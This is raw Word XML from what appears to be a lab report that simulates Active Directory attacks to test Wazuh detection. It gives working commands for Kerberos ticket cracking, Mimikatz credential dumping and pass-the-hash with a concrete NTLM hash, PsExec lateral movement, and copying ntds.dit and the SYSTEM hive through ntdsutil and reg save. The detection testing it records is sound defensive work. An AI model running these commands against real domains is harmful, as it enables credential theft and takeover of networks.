          <w:p w14:paraId="4FE8DBCD" w14:textId="16E149CB" w:rsidR="00742A9D" w:rsidRPr="00742A9D" w:rsidRDefault="00742A9D" w:rsidP="00742A9D">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00742A9D">
              <w:t>./tgsrepcrack.py password.txt 1-40a10000-Administraor@HTTP~webserver.sfm.local-WINSERV.LOCAL.kirbi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00954D1C" w14:textId="77777777" w:rsidR="003870DB" w:rsidRDefault="003870DB" w:rsidP="00A877B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601DE0B4" w14:textId="1AE5E52A" w:rsidR="003870DB" w:rsidRPr="003870DB" w:rsidRDefault="002E754F" w:rsidP="00A877B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="003870DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C08B975" wp14:editId="1297F174">
            <wp:extent cx="6225504" cy="2117090"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="19909086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2625" cy="2129713"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FEDDEC" w14:textId="77777777" w:rsidR="003870DB" w:rsidRDefault="003870DB" w:rsidP="00A877B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B8536C9" w14:textId="61F722CC" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2" w:rsidP="00A877B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Pass-the-Hash (PtH) Attack Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00938FF8" w14:textId="77777777" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2" w:rsidP="00A877B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Simulate a Pass-the-Hash attack to verify Wazuh’s detection of suspicious authentication using stolen NTLM hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3806D37E" w14:textId="77777777" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2" w:rsidP="00A877B2">
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps and Commands Executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED246B5" w14:textId="3907F7EE" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Enable debug privileges in Mimikatz:</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877B2" w14:paraId="0A24CAFA" w14:textId="77777777" w:rsidTr="00A877B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0C894B92" w14:textId="249E25AC" w:rsidR="00A877B2" w:rsidRDefault="00A877B2" w:rsidP="00A877B2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A877B2">
              <w:t>privilege::debug</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02FED641" w14:textId="77777777" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2" w:rsidP="00A877B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03EF62A7" w14:textId="3DC0AA21" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Grants Mimikatz necessary privileges to access sensitive credential data in memory.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>Output confirms Privilege '20' OK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0088CE70" w14:textId="5A7A6421" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Start logging actions to a file for auditing purpos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877B2" w14:paraId="66A1F73C" w14:textId="77777777" w:rsidTr="00A877B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="12231324" w14:textId="7C12C9BA" w:rsidR="00A877B2" w:rsidRDefault="00A877B2" w:rsidP="00A877B2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A877B2">
              <w:t>log passthehash.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0256F000" w14:textId="77777777" w:rsidR="00A877B2" w:rsidRDefault="00A877B2" w:rsidP="00A877B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B645430" w14:textId="653F43E5" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Keeps a record of commands executed, which is useful for later validation and troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29054867" w14:textId="70FFF5B0" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Dump credentials from memory (optional referenc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877B2" w14:paraId="01E08216" w14:textId="77777777" w:rsidTr="00A877B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4ECF4D97" w14:textId="29197238" w:rsidR="00A877B2" w:rsidRDefault="00A877B2" w:rsidP="00A877B2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A877B2">
              <w:t>sekurlsa::logonpasswords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6792005A" w14:textId="77777777" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2" w:rsidP="00A877B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB75815" w14:textId="2FA141CB" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Retrieves logon session credentials, including plaintext passwords, hashes, and Kerberos tickets. Helps simulate realistic attacker techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D386E" w14:textId="060667F0" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Use NTLM hash to authenticate as Administrator (Pass-the-Hash) and spawn cmd.ex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A877B2" w:rsidRPr="001E2C55" w14:paraId="29BBA20C" w14:textId="77777777" w:rsidTr="00A877B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3E5DA625" w14:textId="11A027FA" w:rsidR="00A877B2" w:rsidRDefault="00A877B2" w:rsidP="00A877B2">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A877B2">
              <w:t>sekurlsa::pth /user:Administrator /domain:WINSERV /ntlm:580b16d486d8d2cafa00b314d41fa396 /run:cmd.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30DC1B48" w14:textId="70AC2D2E" w:rsidR="00A877B2" w:rsidRPr="00E86347" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E86347">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Simulates lateral movement by using the stolen NTLM hash instead of the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC76819" w14:textId="77777777" w:rsidR="00A877B2" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>This demonstrates how attackers can gain access without cracking passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504E0E9A" w14:textId="3D59A5FA" w:rsidR="00D57A6E" w:rsidRPr="00EE4FDA" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Wazuh can detect unusual logon patterns and generate alerts if configured properly.</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D57A6E" w:rsidRPr="001E2C55" w14:paraId="3156FD68" w14:textId="77777777" w:rsidTr="00D57A6E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="77C08FBB" w14:textId="030726A8" w:rsidR="00D57A6E" w:rsidRDefault="00D57A6E" w:rsidP="00D57A6E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00D57A6E">
              <w:t>.\psexec.exe \\192.168.182.10 -u WINSERV\Administrator -p 580b16d486d8d2cafa00b314d41fa396 cmd.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A33D640" w14:textId="4C8C97D6" w:rsidR="00A877B2" w:rsidRDefault="00D57A6E" w:rsidP="00D57A6E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D57A6E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidRPr="00D57A6E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>triggered NTLM and Pass the HASH alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1E8E00" w14:textId="1B78B52B" w:rsidR="006C2F05" w:rsidRDefault="00EE4FDA" w:rsidP="00D57A6E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00CAE9D9" wp14:editId="4BA736BF">
            <wp:extent cx="6476727" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="18217248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1753" cy="2074880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD78C7A" w14:textId="247BF547" w:rsidR="00EE4FDA" w:rsidRPr="00EE4FDA" w:rsidRDefault="00EE4FDA" w:rsidP="00D57A6E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE4FDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">WAZUH ALERT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A37980D" w14:textId="2B033206" w:rsidR="008A0CA0" w:rsidRDefault="00EE4FDA" w:rsidP="00D57A6E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71EC0016" wp14:editId="281D8DCB">
            <wp:extent cx="6958965" cy="2186940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="20127882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8965" cy="2186940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4C81FB" w14:textId="77777777" w:rsidR="00EE4FDA" w:rsidRDefault="00EE4FDA" w:rsidP="00A4564F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4871D1E8" w14:textId="77777777" w:rsidR="00E86347" w:rsidRPr="00E86347" w:rsidRDefault="00E86347" w:rsidP="00A4564F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E86347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Extracting Passwords from ntds.dit and the SYSTEM Hive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6550AC5D" w14:textId="3970DCFF" w:rsidR="00E86347" w:rsidRPr="00E86347" w:rsidRDefault="00E86347" w:rsidP="00A4564F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E86347">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">The ntds.dit file, normally located in C:\Windows\NTDS, is the database that stores all Active Directory information, including user password hashes. To simulate the attack and extract these hashes, we need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E86347">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>create a consistent copy of the file and associated registry keys, which allows us to decrypt passwords offline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548D7F4F" w14:textId="77777777" w:rsidR="00E86347" w:rsidRPr="00E86347" w:rsidRDefault="00E86347" w:rsidP="00E86347">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E86347">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>To simulate the attack, we followed these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5032C030" w14:textId="5359E166" w:rsidR="007D193C" w:rsidRPr="00E86347" w:rsidRDefault="00E86347" w:rsidP="00E86347">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E86347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>1- Run a SYSTEM session on the domain controll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D193C" w:rsidRPr="001E2C55" w14:paraId="1465A52A" w14:textId="77777777" w:rsidTr="007D193C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="207DC7C5" w14:textId="68D9F08A" w:rsidR="007D193C" w:rsidRDefault="007D193C" w:rsidP="007D193C">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A4564F">
              <w:t>C:\Tools\PSTools&gt; .\PsExec.exe \\WIN-1214V1PJ268 -s -i cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="339416E6" w14:textId="77777777" w:rsidR="007D193C" w:rsidRPr="00A4564F" w:rsidRDefault="007D193C" w:rsidP="00A4564F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14F9581F" w14:textId="77777777" w:rsidR="00B86EF0" w:rsidRDefault="00E86347">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E86347">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>This command opens a command prompt with SYSTEM privileges on the remote domain controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8A98C6" w14:textId="34DCC835" w:rsidR="00A4564F" w:rsidRPr="00E86347" w:rsidRDefault="00E86347" w:rsidP="00B86EF0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E86347">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>• Why: Accessing ntds.dit and the registry keys requires SYSTEM privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF9CD94" w14:textId="687E45FA" w:rsidR="00A4564F" w:rsidRPr="00B00E59" w:rsidRDefault="00B00E59" w:rsidP="00A4564F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B00E59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>2- Create a full IFM copy of the AD databas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D193C" w:rsidRPr="001E2C55" w14:paraId="6205D0ED" w14:textId="77777777" w:rsidTr="007D193C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="76FCF9BD" w14:textId="5439C2EA" w:rsidR="007D193C" w:rsidRDefault="007D193C" w:rsidP="007D193C">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A4564F">
              <w:t>C:\Windows\system32&gt;ntdsutil "activate instance ntds" "ifm" "create full C:\Files" q q</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5026C6E7" w14:textId="77777777" w:rsidR="007D193C" w:rsidRPr="00A4564F" w:rsidRDefault="007D193C" w:rsidP="00A4564F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39215C97" w14:textId="4E47D865" w:rsidR="00B00E59" w:rsidRPr="00B00E59" w:rsidRDefault="00B00E59" w:rsidP="00B00E59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B00E59">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>•  activate instance ntds: Activates the NTDS instance to apply the following commands to the Active Directory service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE9DF0D" w14:textId="35457488" w:rsidR="00B00E59" w:rsidRPr="00B00E59" w:rsidRDefault="00B00E59" w:rsidP="00B00E59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B00E59">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>•  ifm → create full C:\Files: Creates a full copy of the Active Directory database and the necessary registry files in the C:\Files directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCF16F5" w14:textId="5A1ED987" w:rsidR="00A4564F" w:rsidRPr="00B00E59" w:rsidRDefault="00B00E59" w:rsidP="00B00E59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B00E59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>3- Back up the SYSTEM hiv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D193C" w:rsidRPr="001E2C55" w14:paraId="3B61453A" w14:textId="77777777" w:rsidTr="007D193C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="23EC4D61" w14:textId="5D03875C" w:rsidR="007D193C" w:rsidRPr="007D193C" w:rsidRDefault="007D193C" w:rsidP="007D193C">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00A4564F">
              <w:t>C:\Windows\system32&gt;reg save HKLM\SYSTEM C:\Files\SYSTEM.hive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="290BD8CB" w14:textId="77777777" w:rsidR="007D193C" w:rsidRPr="00A4564F" w:rsidRDefault="007D193C" w:rsidP="00A4564F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612B9FBF" w14:textId="77777777" w:rsidR="00A4564F" w:rsidRPr="00A4564F" w:rsidRDefault="00A4564F" w:rsidP="00A4564F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4564F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>The operation completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619C461D" w14:textId="77777777" w:rsidR="00A4564F" w:rsidRPr="00A4564F" w:rsidRDefault="00A4564F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4564F">
        <w:t>Sauvegarde de la ruche SYSTEM dans un fichier .hive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433ABDAC" w14:textId="77777777" w:rsidR="00A4564F" w:rsidRPr="00A4564F" w:rsidRDefault="00A4564F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4564F">
        <w:t xml:space="preserve">Pourquoi : cette ruche contient la </w:t>
      </w:r>
      <w:r w:rsidRPr="00A4564F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BootKey</w:t>
      </w:r>
      <w:r w:rsidRPr="00A4564F">
        <w:t>, nécessaire pour déchiffrer les mots de passe stockés dans ntds.dit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03539FCE" w14:textId="77777777" w:rsidR="002F5292" w:rsidRDefault="00EE4FDA" w:rsidP="003276E6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19219F7C" wp14:editId="6004D9B3">
            <wp:extent cx="6652260" cy="3360420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="194614394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2260" cy="3360420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
